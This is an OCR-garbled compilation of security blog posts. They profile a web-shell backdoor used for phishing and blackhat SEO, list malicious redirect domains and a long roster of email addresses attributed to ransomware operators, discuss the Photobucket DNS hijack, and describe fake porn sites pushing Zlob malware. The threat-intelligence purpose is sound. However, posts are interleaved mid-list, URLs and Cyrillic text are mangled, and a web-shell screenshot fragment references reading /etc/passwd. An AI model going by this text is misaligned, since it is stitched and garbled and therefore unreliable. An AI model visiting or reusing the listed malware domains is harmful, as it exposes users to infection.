Execute Command on server 
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/* Gelete soript 

//anilink(* php"): 

//cewatile("/ete/ passwd") 
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[85] 
15864 


[86] 


15865 


[87] 


15866 


[91] 
15870 


[92] 


15871 


[93] 


15872 


How many ways in which a malicious party can abuse its unauthorized access to a host, 
can you think of? In this example of [1]remotely file included web backdoor (web shell), we 
have a malicious party that’s hosting a web spammer, planning to launch a phishing attack 
impersonating Halifax, locally hosting blackhat SEO junk pages redirecting to rogue security 
software, redirecting to multiple live exploit URLs through javascript obfuscations, as well as 
to fake casinos and fake celebrity video sites - all from a single location. 


BHUMAHME HA BALL CAUT 3AXOQMT MANO KIMWEHTOB !!! 


NpogBuxeHne Bawero catta B NOMCKOBLIX CucTeMax - oT 2000 py6. 
Ontumu3zauna Cahtta nog Axngekc Rambler - or 2000 py6. 
Pexnamma B MHTepHete - oT 1000 py6nen 
Co3ganHve Caitta no Bawemy 3aKka3y oT 1000 py6. 3a 2-3 qHA 
Bb! AoBepsete HaM CBOe Pa3sBuTMe B MHTEPHETe, MbI NPHBOAMM Bam KNMeHTB | 


This risk-forwarding process for all the malicious and criminal activities to the owner of the 
compromised web server is something usual, what’s more interesting in this case is the num- 
ber and diversity of the affiliations this guy has set up in order to monetize the unauthorized 
access by using all the possible sources of revenues like the ones | pointed on in a previous 
post regarding [2]increasing monetization of web site defacements. 
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[100] 
15879 


[101] 
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[102] 


15881 
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In fact, he seems to have built enough confidence in the new "hosting provider", that he’s 
even hosting his blackhat SEO advetising services there. The multiple javascript obfuscations 
hosted locally, point to the following malicious domains which expose all the revenue generat- 
ing affiliations, and even more malicious doorways : 


analytics-google .info 
/q/urchin.js 
209.205.196.16/freehost22/paula2/index.php?id=0271 
209.205.196.16/freehost22/paula2/exxe.php?id=0271 
crklab .us/index.php 
my-page-de .info/in.cgi?2 &1400397 
tapki .cn/1.html?92465 
dificalgot .net/s/in.cgi?2?1121268b0d022308 
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[106] 
15885 


nnanesesnsnastosnseennannsnsnessanssssasssssssstie 
ee eeeeeeeesnereeneneseanasaasassassaneeneeneresaanasnsensanbasene, 


[107] 
15886 


[108] 


[109] 


15887 


[110] 


15888 


aw 


] ahmures-official 


& 


[111] 
15889 


my-page-de .info?default.cgi 


magichotgaming .net 


allextra .com/best/go.php?sid=2 &tds-parametr1=Taryn+Manning 
newextra .com/in.cgi?19 &group=allextra 

drivemedirect .com/soft.php?aid=0358 &d=3 &product=XPA 
securityscannersite .com/2008/3/freescan.php?aid=880358 


Sampe detection rate for the [3]casino adware, a reminder on why you shouldn’t [4]play 
poker on an infected table : 


El Gold VIP Club Casino aes) | 
Annee! 


Welcome to the Gold VIP Club Casino 
Installer 


The installer must download some required 
components before proceeding. 


Thank you for your patience, 


Geld 


This installer guides you through the steps 
necessary to install the Casino software. 
To get started, click Next. 


Communication error. 


Retry Now Cancel 


Scanners result : 7/33 (21.22 %) 

Trojan.Casino.466752; W32/Casino.A.gen!Eldorado; Adware.Casino-18 
File size: 466752 bytes 

MD5...: bOf70441dde5c2b82ba5388f3d566576 

SHA1..: 5603b1b972e2cff99d6339fbd8970278f5ff371d 


To sum up - with the overall availability of [5]templates for phishing sites, fake video 
sites, [6]fake security software, as well as the ongoing traffic management tool’s convergence 
with web malware exploitation kits, the opportunity for a malicious party to participate in 
different [7]affiliate based scams on revenue Sharing basis, increases. Therefore, what looked 
like an isolated attack, is slowly becoming an "attack in between" the rest of the malicious 
activities lunched by the same party. 
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[116] 


15894 


[117] 


15895 


Sample photos includes: 


[118] 


14. | KAMALIAN Behrouz | POB: Tehran | Head of the IRGC- linked “Ashiyaneh” cyber group. 10.10.2011 


DOB: 1983 | The “Ashiyaneh” Digital Security, founded by Behrouz 
Kamalian is responsible for an_ intensive cyber- 
crackdown both against domestic opponents and 
reformists and foreign institutions. On 21 June 2009, 
the internet site of the Revolutionary Guard's Cyber 


Defence Command posted still images of the faces of 
people, allegedly taken during post-election demon- 
strations, Attached was an appeal to Iranians to 
“identify the rioters”. 


Stay tuned! 
15896 


1. iveps:/71 bp. blogspot  con/—9e-KBAUHYaD/ Ket pgyL.731/AAAAAAANGo/bT=hGBNOuycAD£03qAEAYgufVGpYALWACL&BCASYHQ 
"https ://Adanchov blogspot .on/2020/10/ exposing” iren-based-hackers-and-web.htal 
 ivepe:/ /Adanchov blogspot ,con/2020/01 exposing” arens-hacking-scene-and,btal 


ttps://unit-123.org/wp-content/uploads/2021/05/Iran.ra 
ttps://unit-123.org/wp-content/uploads/2021/05/Dancho_Danchev_Analysis_Report_Iran_Hacking Scene.ra 


ttps://unit-123.org/wp-content/uploads/2021/05/Iran_Hackers_Personal_Web_Sites_Repository.ra 
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ttps://1.bp.blogspot.com/-ycFEBU1Xi34/YKs1ixG8gyI/AAAAAAAANDw/1cH-pWvM1QUMtamdr _1dGr5A1iH2wDSKQCLcBGASYHQ 
s640/10607925_859334594124308_2105062527_n. jpg 


ttps://1.bp.blogspot.com/-Irfx4894CiA/YKs1iUqiT4I/AAAAAAAANDO/pF1in_5MpZHEkxdxuz60GRwvb_4- jE9ZZACLcBGAs 
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17.5.4 Profiling a Currently Active High-Profile Cybercriminals Portfolio of 
Ransomware-Themed Extortion Email Addresses - Part Three (2021-05-24 19:29) 


[1] 
15901 


(a 


All FILES ENCRYPTED "RSA1024" 


ME YOUR 1TLES HAVE BEEN INCRYPTEDS IF YOU WANT TO RI STORE TM, WRITE US TO The f An 

IM THE LETTER WRITE YOUR Im, YouR ID 

IF YOU ARE WOT ANSWERED, WRITE TO MAM) 

YOUR SECRET KEY WILL Bf STORED Oty A SERVER 7 DAYS, AFTER 7 DAYS IT MAY BE OVERWRITTEN BY OTHER KEYS, DONT PULL 


PRE OLCRYP TION fom PROOT 
Yow can send us up to 1 file for tree Gecryption. The total uae of fies must be leas than IMD (non aecheved), and fies whould not contam vakuible information (dstabases backups, 


DECRYPTION PROCESS: 


you make ware of Gecrypton pow 


Shipping them while they’re hot. 


Continuing the "[2]Profiling a Currently Active High-Profile Cybercriminals Portfolio of 
Ransomware-Themed Extortion Email Addresses - Part Two" including "[3]Exposing Pro- 
tonmail and Tutanota’s Illicit Abuse by Ransomware Gangs - A Compilation of Currently Active 
Ransomware-Themed Email Addresses" including "[4]Profiling a Currently Active High-Profile 
Cybercriminals Portfolio of Ransomware-Themed Extortion Email Addresses" series I’ve de- 
cided to share yet another recently obtained using Technical Collection portfolio of currently 
active personal email addresses belonging to currently active lone ransomware users including 
ransomware gangs with the idea to assist U.S Law Enforcement on its way to track down and 
prosecute the cybercriminals behind these campaigns. 


Currently active sample ransomware-themed personal email addresses known to have partic- 
ipated including to be currently participating in active ransomware-themed campaigns: 


yasomoto@tutanota.com 
eye@onionmail.org 
seamoon@criptext.com 
saturndayc@protonmail.com 
ohoussem.bale6@sikatan.co 
5abra.adrinelt@datacoeur.com 
Amonica.nascimene@vibupis.tk 
matryoshka.iosef@airmail.cc 
restorealldata@firemail.cc 
gorentos@bitmessage.ch 
15902 
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_hetp://adanchev. blogspot .con/2007/11/aalware-serving- onl ne-casinos tal 
. http: //ddanchev. blogspot . com/2007/09/dont-play-poker-on-infected-table. html 


http: //ddanchev.blogspot . com/2008/03/phishing-pages-for-every-bank-are .htm 


http: //ddanchev.blogspot.com/2007/12/diverse-portfolio-of-fake-security.htm 


. http://ddanchev. blogspot .com/2007/10/incentives-model-for-pharmaceutical .htm 


4.6.14 An Update to Photobucket’s DNS Hijacking (2008-06-24 12:19) 


INS records might still pol 
there should be no further 


Web Hosting Tips 


Most web hosting packages include one or more Just about anybody can create 


databases 3 presence on the intornet 
What can you use them for? How will they nelp 
your website? Building a web sile can be as 
simple 38 using a word 
Eree File Storage Read on for the answers to these questions processor 
100% Secure and Free, Get 1GB Store Pics, Music 
Data, Docs etc A database stores data, but more importantly, Once you have the site you 
wwe Huddle net allows that data can easily be accessed need a way to publish it on the 
World Wide Web. 


Bancaidth is a term that has several diferent 
meanings depending on the context 
This is where web-hosting 
When talking about bandwidth in terms of Web companies come in 
Hosting it refers to the amount of data that 
transfers into and out of your wed hosting account 
Ads by 
1) Choose an annual hosting plan - M you are happy with your hosting provider, consider moving to an annual payment basis. By doing this, you 


can benefit from the monthly discount If you are looking to transfer to a new web host, you might also wish to consider an annual plan as they 
Affen Came with nn cota foo 


With [1]Photobucket’s recently hijacked DNS records by Turkish hacking group, the second 
high profile DNS hijack for the past two months next to [2]Comcast.net’s DNS hijacking in May, 
domain [3]registrant impersonation attacks seems to fully work, and Tier 1 domain registrars 
remain susceptible to them. 


So far, none of these DNS hijacks served any malware, live exploits, or bogus home pages 
aiming to steal accounting data. However, the DNS hijacking by itself resulted in a Denial of 
Service attack on Photobucket, one that would have required a great deal of bandwidth if it 
were executed in the old fashioned frontal attack approach. 


And with Photobucket still labeling the DNS hijacking as a "DNS error", their failure to 
admit what has actually happened is already sparkling quite a few negative comments across 
the Web - with a reason. Creating alternate realities when it comes to evidential proof of a 
hack isn’t necessarily state of the art public relations. Photobucket.com’s domain registrar, 
[4]the Register.com comments on the DNS hijacking : 
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"The Photobucket site was down for a very short time and was restored immediately 
when we became aware of the issue." Roni Jacobson, general counsel of Register.com, said in 
a statement on Thursday. "We are currently investigating the source of the problem. " 


As well as Atspace.com’s (Zettahost.com) [5]statement left on their site regarding the 
DNS hijacking : 


" IMPORTANT! Photobucket.com problem read here: 


Last night Photobucket.com DNS at register.com was hacked by malicious people that are 
trying to compromise our business! We are in no way affiliated with such bad deeds and co- 
operate with photobucket in capturing these individuals. They have pointed the domain pho- 
tobucket.com to an account hosted on our systems! We have blocked that and photobucked 
techs have restored the domain pointing to its original location!ALL account information and 
pictures on photobucket.com are OK, please have patience! Unfortunately the complete DNS 
replication usually takes 24-48 hours and during this time caches DNS records might still point 
to us! 


The normal operation of Photobucket is restored and as soon as the replication is complete 
there should be no further such issues! We would like to emphasize that we are in now way 
responsible for what happens with photobucket and all users bumping across our systems! 


We are a legitimate web hosting company operating since 2003 and in no way tolerate 
such hacking attempts! If you have any questions please do not hesitate to contact us at 
abuse@zettahost.com! Thanks for your patience and understanding! " 


When the affected company acts like nothing’s happened, whereas multiple sources con- 
tinue providing pieces of the puzzle, a statement on the measures taken to prevent that type 
of hijacking in the future would be better PR than denying the hijacking of the first place and 
the fact that they could have pointed Photobucket.com to anywhere they wanted to. 


1, ft tp: //blogs.zdnet con/security/?p-1288 
2. hetp:/ fologs.zdnet con/security/2p=1213 
3, http: / blogs. zinet con/security/?p-1208 
4, netp://nevs.cnet .con/ 8901-10724, 9-9973945-7 eal 


5. http: //atspace.com/dedicated-web-server—hosting-domain-articles-news/ 
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crimecrypt@airmail.cc 
sofucked@freespeechmail.org 
supercrypt@mailer9.com 
syspentesting@aol.com 
taargo@iran.ir 

taargo@feecca.com 
databack44@uta.io 

c-m58@mail.ru 
helmanager@firemail.cc 
helmanager@iran.ir 
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tors@tuta.io 
supportfile@yandex.com 


towerweb@yandex.com 


reservedecryption@protonmail.com 


decservice@mail.ru 


recoverydbservice@protonmail.com 


amandacerny89@aol.com 
wecanhelp2@protonmail.com 
worldsnake@cock.li 
fonix@tuta.io 
fonix@mailfence.com 
yoursalvationsa@protonmail.ch 
zoldon-staff@mail.ru 
evilevilmaxsokolov@yahoo.com 
nonreply@mail.goog.le.com 
ihurricane@sigaint.org 
rememberggg@tutanota.com 
Insane@airmail.cc 
rapid@airmail.cc 
systempcl@keemail.me 
nina.edge.1979@mail.ru 
skynet45@tutanota.com 
alexbanan@tuta.io 
blacklist@clock.li 
newsantaclaus@aol.com 
lizethroyal@aol.com 
Pponce.lorena@aol.com 
dalailama2015@protonmail.ch 
bordeaux@sothis.fr 
Happydayz@india.com 

dream _dealer@aol.com 
fileslocker@pm.me 
raphaeldupon@aol.com 
Sos@anointernet.com 


Fud@india.com 
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redshitline@india.com 
safeanonym14@sigaint.org 
Wisperado@india.com 
avastvirusinfo@yandex.com 
Starbax@tutanota.com 
BaYuCheng@yeah.net 
Karlosdecrypt@outlook.com 
Backdata@qq.com 
Helpfilerestore@india.com 
back _data@foxmail.com 
Blammo@cock.|i 
SyndicateXxXX@aol.com 
parambingobam@cock.|i 
admin@decryption.biz 
bizarrio@pay4me.in 
decrypthelpfiles@protonmail.com 
5btc@protonmail.com 
Xzet@tutanota.com 
suppfirecrypt@qq.com 
audit24@qq.com 
mahasaraswati@india.com 
Anony.killers@protonmail.com 
wlojul@secmail.pro 
goodjob24@foxmail.com 
sebastiennolet92@gmail.com 
cyberwars@qq.com 
support@juicylemon.biz 
provectus@protonmail.com 
Help@onyon.info 
Look1213@protonmail.com 
Everbe@airmail.cc 
mr.hacker@tutanota.com 
webmafia@asia.com 
mrbin775@gmx.de 
mrbin775@protonmail.com 
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4.6.15 Fake Porn Sites Serving Malware (2008-06-25 16:11) 


Video ActiveX Otgect Error! 

Your browser cannct display vs video Sie 

You Need to download new version of 

Video Actvex COject 10 view Pris video tite 
k Continue to Gownload and instal ActvexX OOject 


Ah, that RBN with its centralization mentality for the sake of ease of management and 99.999 
% uptime. In this very latest example of using malicious doorways redirecting to fake porn 
sites, consisting of over twenty different domains serving the usual Zlob malware variants, we 
have a decent abuse of a template for a porn site. 


The easy of management of such domain farms and the availability of templates for 
high trafficked topic segments such as celebrities and pornography, continue contributing to 
the increasing number of Zlob variants served through fake codecs. Moreover, once set up, 
the malicious infrastructure starts attracting now just generic search traffic, but also traffic 
coming from affiliates with whom revenue is shared on the basis of the number of people that 
downloaded the codec. 
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Patagonia92@tutanota.com 
Makdonalds@india.com 
GruzinRussian@aol.com 
Opencode@india.com 
Radxlove7@india.com 
Grand _car@aol.com 
radix.love@aol.com 
powerbase@tutanota.com 
Okean-1955@india.com 
AskHelp@protonmail.com 
Matrix9643@yahoo.com 
help@badfail.info 
Masterlock@india.com 
Ramachandra7@india.com 
Age _empires@india.com 
Savepanda@india.com 
Restore@protonmail.ch 
Bitcoinrush@imail.com 
Diablo diablo2@aol.com 
Legioner_seven@aol.com 
Gerkaman@aol.com 
Raa-consultl@keemail.me 
Batman _good@aol.com 
fndimaf@gmail.com 
Seven _legion@aol.com 
Calipso.god@aol.com 
Melme@india.com 
Mailrepa.lotos@aol.com 
Space __rangers@aol.com 
Ceri1l33@india.com 
mirey@tutanota.com 
bkp@cock.|i 
contact@usps.com 
Cocoslim98@gmail.com 


Santa _helper@protonmail.com 
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gpcode@gp2mail.com 
fbi-cybercrimedivision@hotmail.com 
Colecyrus@mail.com 
Darknes@420blaze. it 
btc@fros.cc 
starter@cumallover.me 
3442516480@qq.com 
bitlocker@foxmail.com 
Recuperadados@protonmail.com 
Thedon78@mail.com 
Xbotcode@gmail.com 
Supermagnet@india.com 
cranbery@colorendgrace.com 
backtonormal@foxmail.com 
helpersmasters@airmail.cc 
Lbtc@qbmail.biz 
nstoneland@firemail.cc 
helpteam@mail.ch 
restorefiles@firemail.cc 
Benjamin Jack2811@aol.com 
Veracrypt@foxmail.com 
mrcrypting@airmail.cc 
restoredjvu@india.com 
restoredjvu@firemail.cc 
helpshadow@india.com 
helpshadow@firemail.cc 
mrpeterson@cock.li 
Salesrestoresoftware@firemail.cc 
Admin@stex777.com 
nrestoredjvu@firemail.cc 
nhelpshadow@india.com 
nhelpshadow@firemail.cc 
marat20@cock.li 
vauvau@cock.li 
badfail@qq.com 
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sabantui@tutanota.com 
udacha@cock.li 
cryz1@protonmail.com 
qar48@tutanota.com 
unCrypte@outlook.com 
decodevoid@gmail.com 


docodepepe@gmail.com 


petersburgrecover@protonmail.com 


jacklee@airmail.cc 
jacklee73@mail.ua 
b1tcO1ln@aol.com 
lillysoft.it@gmail.com 
Recoverhelp@protonmail.ch 
noreply@blogger.com 
rdphack@onionmail.org 
getdecrypt@disroot.org 
axitrun@cock.li 
decoding@qbmail.biz 
gocrypt@aol.com 
btckeys@aol.com 
musmansikandar960@g.mail.com 
259461356@qq.com 
returnmefiles@aol.com 
checkcheck07@qq.com 
yyuzhou13@tutanota.com 
decrypt@files.mn 
asdbtc@aol.com 
team-assistO0O2@pm.me 
avaaddams@msgsafe.io 
backdata@zimbabwe.su 
ucos2@elude.in 
smithhelp@mail.ee 
savebase@aol.com 
blackhat@iname.com 


corebitp@cock.li 
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nmode@tutanota.com 
admin@sectex.net 
22btc@tuta.io 
billwong73@yahoo.com 
painplain98@protonmail.com 
keysfordencryption@airmail.cc 
datahlp@tuta.io 
hpjar@keemail.me 
hpjar@protonmail.ch 
donald888@mail.fr 
ballxball@protonmail.com 
mikolio@cock.li 
rottencurd@vivaldi.net 
databankasi@bk.ru 
Sacura889@tutanota.com 
chinadecrypt@fasthelpassia.com 
savemyselfl@tutanota.com 
crioso@protonmail.com 
wiruxa@airmail.cc 
yongloun@tutanota.com 
anygrishevich@yandex.ru 
qirapoo@firemail.cc 
dozusopo@tutanota.com 
unlockfile@firemail.cc 
files@restore.ws 
2021@onionmail.org 
2022@onionmail.org 
zezoxo@libertymail.net 
togerpo@zohomail.eu 
f0138skbeu@gmail.com 
angry _war@protonmail.ch 
cheetOs de@protonmail.com 
Pringls us@protonmail.com 
helpservis@horsefucker.org 
zeppelindecrypt@420blaze.it 
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zeppelin helper@tuta.io 
zeppelin decrypt@xmpp.jp 
fufqod1232@gmail.com 
tchukopchu@tutanota.com 
cl _crypt@aol.com 
admin@steldatas.com 
admin@stelsdatas.com 
recovery@qbmail.biz 
decrypt@msgsafe.io 
konedieyp@airmail.cc 
cyberunion@tuta.io 
decrypt2021@elude.in 
decrypt2020@aol.com 
qql1935@maail.fr 
backinfo@protonmail.com 
technopc@tuta.io 
decrypttme@airmail.cc 
agent.dmr@protonmail.com 
dayonpay@aol.com 
dr.decrypt@aol.com 
dokulus@tutanota.com 


brokenbrow.teodorico@aol.com 


galuheko48@gmail.co 
datahelp@techmail.info 
Adamfox69@criptext.com 
freshkart@420blaze. it 
getacrypt@tuta.io 
pexdatax@gmail.com 
getscoin2@protonmail.com 
goldmind@tuta.io 
gygabot@cock.|i 
backup24@msgsafe.io 
MerlinWebster@aol.com 
manyfiles@aol.com 


pashmak@tutanota.com 
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savemydata@qq.com 
whitwellpark@aol.com 
linas89@aol.com 
hlpp@protonmail.ch 

how _decrypt@aol.com 
crypthub@tuta.io 
imdecrypt@aol.com 
pain@onefinedstay.com 
jessymail26@aol.com 
teammarcyl10@cock.li 
blackmax@tutanota.com 
kuk1@tuta.io 
cryptlive@aol.com 
lizardcrypt@tuta.io 
lizscudata@tutanota.com 
logan8833@aol.com 
help.crypt@aol.com 
Ixhlp@protonmail.com 
millenisO0O0@qq.com 
meterpreter@null.net 
supermetasploit@aol.com 
james2020m@aol.com 
coronavirus@qq.com 
bitcoin@email.tg 
nathakorn.jack@gmail.com 
dulithaqgamnem@gmail.com 
andre.spadari@gmail.com 
nullcipher@cock.li 
clifieb@tutanota.com 
onepconebtc@protonmail.com 
decrypt@qbmail.biz 
dryidik@tutanota.com 
r3ad4@aol.com 
rassupport@cock.li 


enabledecrypt@aol.com 
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moncler@cock.li 
recoverysq|@protonmail.com 
embog@firemail.cc 
admin@spacedatas.com 
anna.kurtz@protonmail.com 
backdata.company@aol.com 
rsacrypt@aol.com 
debri@keemail.me 
black@gytmail.com 
yourdata@RecoveryGroup.at 
de.crypt@aol.com 
sandeepl.medikonda@gmail.com 
x _coded@protonmail.com 
stopencrypt@qq.com 
sumpterzoila@aol.com 
eusa@tuta.io 
niggchiphoterl974@protonmail.com 
deathransom@ainmail.cc 
ammon0503@tutanota.com 
jackkarter@cock.li 
helpmanager@firemail.cc 
helpmanager@iran.ir 
salesrestoresoftware@gmail.com 
amundas@firemail.cc 
gerentosrestore@firemail.cc 
teamvi@protonmail.com 
teamvv@protonmail.com 
locksvbox@tutamail.com 
vivaldicrypt@outlook.com 
week1@tuta.io 
mr.crypteur@protonmail.com 
rsa2048@cock.li 
databack@qbmail.biz 
help.me24@protonmail.com 


yourfiles1@tuta.io 
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garantos@mailfence.com 
support _blackkingdom2@protonmail.com 
mpdecoder@gmail.com 
zinnik321@cock.li 
ncov2020@aol.com 
backcompanyfiles@protonmail.com 
judgemebackup@tutanota.com 
back _me@foxmail.com 
Wannadecryption@gmail.com 
decrypt@null.net 
embulance@cock.|i 
meterp@torontomail.com 
TomGate33@criptext.com 
cmdroot@airmail.cc 
yourfiles1@tutanota.com 
zphc@cock.li 
Decrypt@criptext.com 
backup@zimbabawe.su 
ARASUF@tutanota.com 
honorsafe@keemail.me 
blablacar@airmail.cc 
hobbsadelaide@aol.com 
Deus69@criptext.com 
supp37@cock.li 
fullrestore@qq.com 
xatixxatix@mail.fr 
ykup@tutanota.com 
bhatmaker@protonmail.com 
bhatmaker@tutanota.com 
buratin@torbox3uiot6wchz.onion 
buratino2@tutanota.com 
buratino@firemail.cc 
daten@airmail.cc 

daten@cock.li 
harveyjq9freemannl1@gmail.com 
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polssh1@protonmail.com 
polssh@protonmail.com 
sofiasqhwellsOgw@gmail.com 
ticketbit@mailfence.com 
ticketbit@tutanota.com 
coincidenceleague@protonmail.com 
prometheushelp@airmail.cc 
Prometheus.help@protonmail.ch 
nprometheushelp@mail.ch 
nprometheushelp@airmail.cc 
nPrometheus.help@protonmail.ch 
u201ccitisupport@gmail.com 
u201cuasfbp12309@aol.com 
u201cnoreply-supportl2961@gmail.com 
u201cuasfbp02309@aol.com 
nrestoremanager@firemail.cc 
iomega@cock.|i 
ndatarestorehelp@firemail.cc 
ndatahelp@iran.ir 
btpsupport@protonmail.com 
aes256@criptexst.com 
thetaprogram@keemail.me 
Brcode2017@gmail.com 
adagekeys@qq.com 
donovantudor@aol.com 
Helprestore@firemail.cc 
file@p-security.|i 
GeorjeHalique@protonmail.com 
vombombom@cock.li 
QyavauZehyco1994@o2.pl 
cottleakela@protonmail.com 
decoder@keemail.me 
decoder@expressmail.dk 
decryptfiles@countermail.com 


villiamsscorj rembly@protonmail.com 
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kabennalzly@aol.com 
flopored@protonmail.com 
deszyfrowanie@airmail.cc 
2183313275@qq.com 
ambulance@keemail.me 
hjelp.main@protonmail.com 
Savemyfiles@protonmail.com 
Lucky _top@protonmail.com 
rsupport@protonmail.ch 
rsupp@protonmail.ch 
ezequielanthon@aol.com 

se _harrd@protonmail.com 
alex _pup@list.ru 
keepcalmpls@india.com 
jerjis@tuta.io 
jerjis@tutamail.com 
crab1917@gmx.de 
crab1917@protonmail.com 
6699nm@protonmail.com 
paydecryption@qq.com 
China.helper@india.com 
racap@qq.com 
recap@qq.com 
decryptxxx@protonmail.com 
everest@airmail.cc 
Harmahelp73@gmx.de 
markmontgomery2020@hotmail.com 
Seautylolal976@aol.com 
grafimatriux72224733@protonmail.com 
jiesuoftuwu@gmail.com 
bexonvelia@aol.com 
admin@bugsfighter.com 
support@hbwsl.com 
Usacrypt@aol.com 
Noreply@sfn.org 
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search-top.com 


watchnenjoy.com 


immensevids,com 
service-porn.com 
pleasure-porn.com 


oO 
NM oN 
co oO 


oO 


planetfreepornmovies,com 
about-adult,net 


at 
tN 
0 


service-porn.com 
pleasure-porn.com 
porn-the. net 
porn-the.net 


tw 


about-adult,net 
look-adult, net 


4 
5 


pleasure-porn.com 
about-adult,net 


oa 


service-porn.com 
porn-the, net 
about-adult.net 
porn-the. net 
about-adult.net 


Nm KH © y 


service-porn.com 
pleasure-porn.com 


S 


about-adult,net 
pleasure-porn.com 
service-porn.com 


vipcodec.net 


In this campaign, the malicious doorway that expands the entire ecosystem is located at 


search- 


top.com/in.cgi?5 &parameter=drs (66.96.85.113). A redirector that appears to [1l]have been 


operating since 2006, according to this forum posting. 


What follows on-the-fly, are all the fake porn sites whose legitimately looking videos at- 
tempt to download a Zlob malware variant from a single location - vipcodec.net . Here are all 


immensevids.com 
scan-porn.net 
poweradult.net 
planetfreepornmovies.com 
about-adult.net 
service-porn.com 
pleasure-porn.com 
porn-the. net 
porn-pleasure.net 
abc-adult,com 
look-adult, net 
name-adult.net 
group-adult.net 
useporn.net 
porn-look.net 
about-adult.net 
porn-popular.com 
group-adult, net 
service-porn.com 
pleasure-porn.com 
contact-adult.net 
helpporn,net 
porn-comp com 


vipcodec,net 


the fake porn sites, and the associated campaigns in this redirection : 


watchnenjoy .com /index.php?id=1287 &style=white 
craziestclips .com /index.php?id=1287 &q= 
immensevids .com 

planetfreepornmovies .com /?t=1 &id=1219 
poweradult .net /edmund/16551689/1/ &id=1219 
scan-porn .net /rosalyn/1742941675/1/ &id=1219 


1596 


u3089.protonmolecule@gmx.us 
Nomoneynohoney@india.com 
Suppteam01@india.com 
Catsexy@protonmail.com 
Orgasm@india.com 
File-help@india.com 
Love.server@mail.ru 

Stay tuned! 


1. https://1.bp.blogspot.com/-h7sEJTemxAc/YKvci6TJvYI/AAAAAAAANLO/t3eH_i6PB6gLg74_iXFvtBhZTMn1lvdH5wCLcBGAsYHQ 
/s1494/Misc_01. jpg 

2. https://ddanchev. blogspot .com/2021/02/profiling-currently-active-high-profile.html 

3. https://ddanchev. blogspot .com/2020/11/exposing-protonmail-and-tutanotas.html 

4. https: //ddanchev. blogspot .com/2020/09/profiling-currently-active-high-profile.html 


17.5.5 Sample Conference Presentations - Accepting Conference Event Invitations! 
(2021-05-25 21:50) 


[1] 


Dear blog readers, 


This is Dancho. I’ve decided to share some of my previous conference event presentation 
photos with the idea to find out who might be interested in inviting me to speak at their event. 
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[7] 


[8] 
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[9] 
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[10] 
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[11] 
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Stay tuned! 


1. https://1.bp. blogspot .com/-9jT90sJ3cBo/YKyUqSKt £31 /AAAAAAAANMg/Wtr6yaoAUaEXYyG1Yt bHYGVsC2PSa4MrACLcBGAsYHQ 
/s600/553117499 . png 

2. https: //speakerdeck.com/ddanchev 

3. https://1.bp. blogspot . com/-mUUZ4NybE_M/YKyUqcla1UI/AAAAAAAANMc/ jh8NWNrPhAsPGv6myhSJpvzSURNxVogVgCLcBGAsYHQ 
/s680/AqWAVOMCIAAIWdc. png 

4. https://1.bp. blogspot .com/-NvEwZAhFiz8/YKyUkkwWCSI/AAAAAAAANMU/gpsc9W4kzvc4 JkWcL2-mGRmgpRCA ju1PwCLcBGAsYHQ 
/s763/Misc_900. jpg 

5. https://1.bp. blogspot .com/-D50dXnly808/YKyUkzepJsI/AAAAAAAANMY/Co60_7iofXw6Czfb56bdFyi7YutRxexLQCLcBGAsYHQ 
/s2048/Misc_02. jpg 

6. https://1.bp. blogspot .com/-QFa2V_Z2P0Q/YKyUkV43UUI /AAAAAAAANMQ/E7P_xruRLU863zc1leq5M3YC7 JaJN2CMeQCLcBGAsYHQ 
/s934/Misc_01. jpg 

7. bttps://1.bp. blogspot .com/-gsKsInxiXE4/YKyUkOUf WmI /AAAAAAAANMM/uN6MkOYRexU3NCBJposC-8g2n_SbBgAcQCLcBGAsYHQ 
/s680/Cyq7K2CWQAAZLT9. jpg 

8. https://1.bp.blogspot .com/-nYavgIKic5I/YKyUjxVp2yI/AAAAAAAANMI /e7bB_5D48V4Bw3xqoDAAaPvKW5teaZ8zwCLcBGAsYHQ 
/s1600/Cyq5HVBXEAYIYnk . jpg 

9. https://1.bp. blogspot .com/-I15Rty7WQNw/YKyUjk1k1mI /AAAAAAAANMA/17VTob7w9VM2cqRxPEbMIUW£ cDqSa8UKQCLcBGAsYHQ 
/s680/Cyq4ARpXgAUp2z0. jpg 

10. https://1.bp.blogspot . com/-SRZ_Ne8Gq2s/YKyUjtFyisI /AAAAAAAANME/pIkAFugMMpQNCD50wuvsv10AJWeagdNdACLcBGAsY 
HQ/s2048/ArUyHsVCQAAoYj8. jpg 

11. https://1.bp.blogspot . com/-vgZgQwLaq8c/YKyUjTQO0qkI /AAAAAAAANL8/_UQbZ1oNk1kTkYvqtqsYR4rQ_0j06McOACLcBGAsY 
HQ/s600/A47NGZwCYAMP6kP . jpg 
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17.5.6 Sample Articles and OSINT Research Publications Full Offline E-Book Compi- 
lations Available! Grab a Free Copy Today! (2021-05-25 21:51) 


Dancho Danchev 


An In-Depth Picture 
Inside Security 
Researcher's Dancho 
Danchev Understanding 
of Security Hacking and 
yboercrime Inciaents 


Dear blog readers, 


This is Dancho and I’ve decided to share with everyone some of my currently active and 
recently published full offline E-Book copy of some of my research articles and OSINT 
publications throughout the years. Are you interested in downloading a free full offline E-Book 
copy of my personal blog in various E-Book reader formats? Are you an Amazon Kindle user? 
Grab a full offline E-Book copy of my personal blog from [1]here and feel free to share it with 
your friends and colleagues. 


Sample research articles and OSINT analysis currently available online for free in multiple 
free E-Book versions courtesy of me: 
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Webroot Inc. 


DANCHO DANCHEV’S 
SECURITY RESEARCH 
FOR WEBROOT INC. 


In-Depth Overview and Analysis 
of Security Blogger Dancho 
Danchev's Security Research for 
Webroot Inc. Circa 2012-2014 
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about-adult .net /emiline/108846601/1/ &id=1219 
service-porn .com /inde/964842117/1/ &id=1219 
pleasure-porn .com /elnora/648311952/1/ &id=1219 
porn-the .net /verge/1734135233/1/ &id=1219 
porn-pleasure .net /dal/1663381205/1/ &id=1219 


scan-porn .ne 
t /gretchen/515268975/1/ &id=1219 
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“AN IN-DEPTH ANALYSIS OF HUNDREDS OF HICH-PROFILE AND 

NEVER-PUBLISHED BEFORE SECURITY RESEARCH ARTICLES AND 

OSINT ANALYSIS BY THE WINNER OF JESSY H. NEAL AWARD FOR 

BEST BLOG FOR ZDNET'S ZERO DAY BLOG FOR 2010." - DANCHO 
DANCHEV 


DANCHO DANCHEV'S 
SECURITY RESEARCH 
PORTFOLIO FOR 


ZDNET'S ZERO DAY 
BLOG 


IN-DEPTH OVERVIEW AND ANALYSIS OF 
SECURITY BLOGGER DANCHO 
DANCHEV'S SECURITY RESEARCH FOR 
ZDNET'S ZERO DAY BLOG CIRCA 2008 
2012 


BY DANCHO DANCHEV 
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Dancho Danchev's 
Offensive Cyber 
Warfare Articles 
Compilation for 

